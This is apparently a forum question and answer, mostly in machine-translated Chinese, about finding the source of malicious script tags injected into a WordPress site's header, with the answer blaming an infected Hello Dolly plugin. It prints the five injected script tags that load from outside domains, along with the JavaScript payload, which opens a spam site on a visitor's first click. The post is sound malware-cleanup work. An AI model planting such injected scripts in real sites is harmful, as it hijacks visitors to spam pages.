如何找到 header 中包含的未知脚本的来源?

How to find the source of unknown script includes in header?

一个站点 运行 Wordpress 会在新用户第一次点击时在新选项卡中打开一个垃圾站点。如果您直接访问 URL 或之前访问过该站点,则不会触发恶意软件。例如,如果您是新用户并从 Google 搜索结果导航到页面,那么您将被重定向(通过新选项卡)到随机垃圾页面。 URL 好像每次都不一样。

到目前为止,我已经尝试了不同的恶意软件扫描程序(Sucuri 和 Wordfence 等),但没有结果。我试过禁用所有插件、更改主题、更新 Wordpress。尝试禁用 pre-fetch。恶意软件仍然存在。

我发现 header 以某种方式包含了五个脚本。通过 Google 结果以隐身模式导航到站点时查看源代码,我可以看到存在的引用。 header 中加载的脚本:

<script type='text/javascript' src='https://longtailmagic.com/domain/i.php' id='hello_newscript0-js'></script>
<script type='text/javascript' src='https://jadsupport.com/includes/i.php' id='hello_newscript1-js'></script>
<script type='text/javascript' src='https://magaliefonteneau.com/wp-content/i.php' id='hello_newscript2-js'></script>
<script type='text/javascript' src='http://futuracp.com/images/i.php' id='hello_newscript3-js'></script>
<script type='text/javascript' src='http://casualwoodcreations.com/images/i.php' id='hello_newscript4-js'></script>

所有五个似乎都是随机页面 运行 Wordpress,提供相同的恶意脚本。查看事件侦听器,我在 click.

下看到 i.php:7

检查从其中一个站点提供的 i.php,它具有以下内容:

localStorage.setItem('test', 'testValue');

if ((localStorage.getItem('test') !== null) &&  (localStorage.getItem('click') == null)){
    
    var click_r = false;
    document.addEventListener("click", function(){ 
    
    if(click_r == false){
    var date = new Date();date.setTime(date.getTime()+(100*24*60*60*1000));
    document.cookie = "a=a; expires=" + date.toGMTString();
    localStorage.setItem('click', 'click');
    window.open("http://etbetrehyheartling.tk/index/?8131599557550");
    click_r = true;
    }
    });
}

有没有办法找到这些脚本包含的生成源并添加到 header?任务是摆脱脚本引用,这似乎是摆脱将新用户重定向到垃圾邮件站点的恶意软件的方法。我已经尝试使用不同关键字的 String Locator 来更接近源代码,但到目前为止没有成功。

根据各种博客,被感染的是Hello-Dolly插件。 删除插件应解决问题。 在此处查看文章 https://wordpress.org/support/topic/suspected-malware/